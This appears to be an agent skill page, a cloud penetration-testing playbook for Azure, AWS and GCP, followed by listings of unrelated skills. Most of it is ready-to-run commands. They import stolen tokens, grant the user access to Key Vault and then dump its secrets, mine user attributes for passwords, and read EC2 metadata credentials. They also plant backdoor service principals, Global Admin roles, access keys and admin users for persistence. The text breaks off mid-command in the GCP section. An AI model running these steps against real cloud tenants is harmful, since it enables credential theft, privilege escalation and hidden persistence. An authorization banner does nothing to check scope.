cloud-penetration-testing
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP).
What this skill does
> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments. # Cloud Penetration Testing ## Purpose Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements. ## Prerequisites ### Required Tools ```bash # Azure tools Install-Module -Name Az -AllowClobber -Force Install-Module -Name MSOnline -Force Install-Module -Name AzureAD -Force # AWS CLI curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip" unzip awscliv2.zip && sudo ./aws/install # GCP CLI tmpdir="$(mktemp -d)" trap 'rm -rf "$tmpdir"' EXIT curl -fsSLo "$tmpdir/google-cloud-sdk-install.sh" https://sdk.cloud.google.com sed -n '1,160p' "$tmpdir/google-cloud-sdk-install.sh" bash "$tmpdir/google-cloud-sdk-install.sh" gcloud init # Additional tools pip install scoutsuite pacu ``` ### Required Knowledge - Cloud architecture fundamentals - Identity and Access Management (IAM) - API authentication mechanisms - DevOps and automation concepts ### Required Access - Written authorization for testing - Test credentials or access tokens - Defined scope and rules of engagement ## Outputs and Deliverables 1. **Cloud Security Assessment Report** - Comprehensive findings and risk ratings 2. **Resource Inventory** - Enumerated services, storage, and compute instances 3. **Credential Findings** - Exposed secrets, keys, and misconfigurations 4. **Remediation Recommendations** - Hardening guidance per platform ## Core Workflow ### Phase 1: Reconnaissance Gather initial information about target cloud presence: ```bash # Azure: Get federation info curl "https://login.microsoftonline.com/[email protected]&xml=1" # Azure: Get Tenant ID curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration" # Enumerate cloud resources by company name python3 cloud_enum.py -k targetcompany # Check IP against cloud providers cat ips.txt | python3 ip2provider.py ``` ### Phase 2: Azure Authentication Authenticate to Azure environments: ```powershell # Az PowerShell Module Import-Module Az Connect-AzAccount # With credentials (may bypass MFA) $credential = Get-Credential Connect-AzAccount -Credential $credential # Import stolen context Import-AzContext -Profile 'C:\Temp\StolenToken.json' # Export context for persistence Save-AzContext -Path C:\Temp\AzureAccessToken.json # MSOnline Module Import-Module MSOnline Connect-MsolService ``` ### Phase 3: Azure Enumeration Discover Azure resources and permissions: ```powershell # List contexts and subscriptions Get-AzContext -ListAvailable Get-AzSubscription # Current user role assignments Get-AzRoleAssignment # List resources Get-AzResource Get-AzResourceGroup # Storage accounts Get-AzStorageAccount # Web applications Get-AzWebApp # SQL Servers and databases Get-AzSQLServer Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG # Virtual machines Get-AzVM $vm = Get-AzVM -Name "VMName" $vm.OSProfile # List all users Get-MSolUser -All # List all groups Get-MSolGroup -All # Global Admins Get-MsolRole -RoleName "Company Administrator" Get-MSolGroupMember -GroupObjectId $GUID # Service Principals Get-MsolServicePrincipal ``` ### Phase 4: Azure Exploitation Exploit Azure misconfigurations: ```powershell # Search user attributes for passwords $users = Get-MsolUser -All foreach($user in $users){ $props = @() $user | Get-Member | foreach-object{$props+=$_.Name} foreach($prop in $props){ if($user.$prop -like "*password*"){ Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop) } } } # Execute commands on VMs Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1 # Extract VM UserData $vms = Get-AzVM $vms.UserData # Dump Key Vault secrets az keyvault list --query '[].name' --output tsv az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list az keyvault secret list --vault-name <vault> --query '[].id' --output tsv az keyvault secret show --id <URI> ``` ### Phase 5: Azure Persistence Establish persistence in Azure: ```powershell # Create backdoor service principal $spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret) $UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR) # Add service principal to Global Admin $sp = Get-MsolServicePrincipal -AppPrincipalId <AppID> $role = Get-MsolRole -RoleName "Company Administrator" Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId # Login as service principal $cred = Get-Credential # AppID as username, secret as password Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal # Create new admin user via CLI az ad user create --display-name <name> --password <pass> --user-principal-name <upn> ``` ### Phase 6: AWS Authentication Authenticate to AWS environments: ```bash # Configure AWS CLI aws configure # Enter: Access Key ID, Secret Access Key, Region, Output format # Use specific profile aws configure --profile target # Test credentials aws sts get-caller-identity ``` ### Phase 7: AWS Enumeration Discover AWS resources: ```bash # Account information aws sts get-caller-identity aws iam list-users aws iam list-roles # S3 Buckets aws s3 ls aws s3 ls s3://bucket-name/ aws s3 sync s3://bucket-name ./local-dir # EC2 Instances aws ec2 describe-instances # RDS Databases aws rds describe-db-instances --region us-east-1 # Lambda Functions aws lambda list-functions --region us-east-1 aws lambda get-function --function-name <name> # EKS Clusters aws eks list-clusters --region us-east-1 # Networking aws ec2 describe-subnets aws ec2 describe-security-groups --group-ids <sg-id> aws directconnect describe-connections ``` ### Phase 8: AWS Exploitation Exploit AWS misconfigurations: ```bash # Check for public RDS snapshots aws rds describe-db-snapshots --snapshot-type manual --query=DBSnapshots[*].DBSnapshotIdentifier aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id> # AttributeValues = "all" means publicly accessible # Extract Lambda environment variables (may contain secrets) aws lambda get-function --function-name <name> | jq '.Configuration.Environment' # Access metadata service (from compromised EC2) curl http://169.254.169.254/latest/meta-data/ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ # IMDSv2 access TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN" ``` ### Phase 9: AWS Persistence Establish persistence in AWS: ```bash # List existing access keys aws iam list-access-keys --user-name <username> # Create backdoor access key aws iam create-access-key --user-name <username> # Get all EC2 public IPs for region in $(cat regions.txt); do aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $region | jq -r '.[]' done ``` ### Phase 10: GCP Enumeration Discover GCP resources: ```bash # Authentication gcloud auth login gcloud auth activate-service-account --key-file creds.json gcloud auth list # Account information gcloud config list gcloud organizations list gcloud projects list # IAM Policies gcloud organizations get-iam-policy <org-id> gcloud projects get-iam-policy <project-id> # Enabled services gcloud services list # Source code repos gcloud source repos list gcloud s
Related in Cloud & DevOps
appbuilder-action-scaffolder
IncludedCreate, implement, deploy, and debug Adobe Runtime actions with consistent layout, validation, and error handling. Use this skill whenever the user needs to add actions to an App Builder project, understand action structure (params, response format, web/raw actions), configure actions in the manifest, use App Builder SDKs (State, Files, Events, database), deploy and invoke actions via CLI, debug action issues, or implement patterns such as webhook receivers, custom event providers, journaling consumers, large payload redirects, action sequence pipelines, and Asset Compute workers. Also trigger when users mention serverless functions in Adobe context, action logging, IMS authentication for actions, or cron-style scheduled actions.
orchestrating-datacloud
IncludedSalesforce Data Cloud product orchestrator for connect→prepare→harmonize→segment→act workflows. Use this skill when the user needs a multi-step Data Cloud pipeline, cross-phase troubleshooting, or data space and data kit management. TRIGGER when: user needs a multi-step Data Cloud pipeline, asks to set up or troubleshoot Data Cloud across phases, manages data spaces or data kits, or wants a cross-phase sf data360 workflow. DO NOT TRIGGER when: work is isolated to a single phase (use the matching phase-specific skill), the task is STDM/session tracing/parquet telemetry (use observing-agentforce), standard CRM SOQL (use querying-soql), or Apex implementation (use generating-apex).
github-project-automation
IncludedAutomate GitHub repository setup with CI/CD workflows, issue templates, Dependabot, and CodeQL security scanning. Includes 12 production-tested workflows and prevents 18 errors: YAML syntax, action pinning, and configuration. Use when: setting up GitHub Actions CI/CD, creating issue/PR templates, enabling Dependabot or CodeQL scanning, deploying to Cloudflare Workers, implementing matrix testing, or troubleshooting YAML indentation, action version pinning, secrets syntax, runner versions, or CodeQL configuration. Keywords: github actions, github workflow, ci/cd, issue templates, pull request templates, dependabot, codeql, security scanning, yaml syntax, github automation, repository setup, workflow templates, github actions matrix, secrets management, branch protection, codeowners, github projects, continuous integration, continuous deployment, workflow syntax error, action version pinning, runner version, github context, yaml indentation error
sf-datacloud
IncludedSalesforce Data Cloud product orchestrator for connect→prepare→harmonize→segment→act workflows. TRIGGER when: user needs a multi-step Data Cloud pipeline, asks to set up or troubleshoot Data Cloud across phases, manages data spaces or data kits, or wants a cross-phase `sf data360` workflow. DO NOT TRIGGER when: work is isolated to a single phase (use the matching sf-datacloud-* skill), the task is STDM/session tracing/parquet telemetry (use sf-ai-agentforce-observability), standard CRM SOQL (use sf-soql), or Apex implementation (use sf-apex).
fabric-cli
IncludedUse this skill for Fabric.so CLI workflows with the `fabric` terminal command: diagnose/install/login, search or browse a Fabric library, save notes/links/files, create folders, ask the Fabric AI assistant, manage tasks/workspaces, generate shell completion, check subscription usage, produce JSON output, and use Fabric as persistent agent memory. Do not use for Microsoft Fabric/Azure/Power BI `fab`, Daniel Miessler's Fabric framework, Python Fabric SSH, Fabric.js, or textile/fashion fabric.
lark
IncludedLark/Feishu CLI skills: lark-cli operations for docs, markdown, sheets, base, calendar, im, mail, task, okr, drive, wiki, slides, whiteboard, apps, approval, attendance, contact, vc, minutes, event. Use when the user needs to operate Lark/Feishu resources via lark-cli, send messages, manage documents, spreadsheets, calendars, tasks, OKRs, deploy web pages, or any Feishu/Lark workspace operations.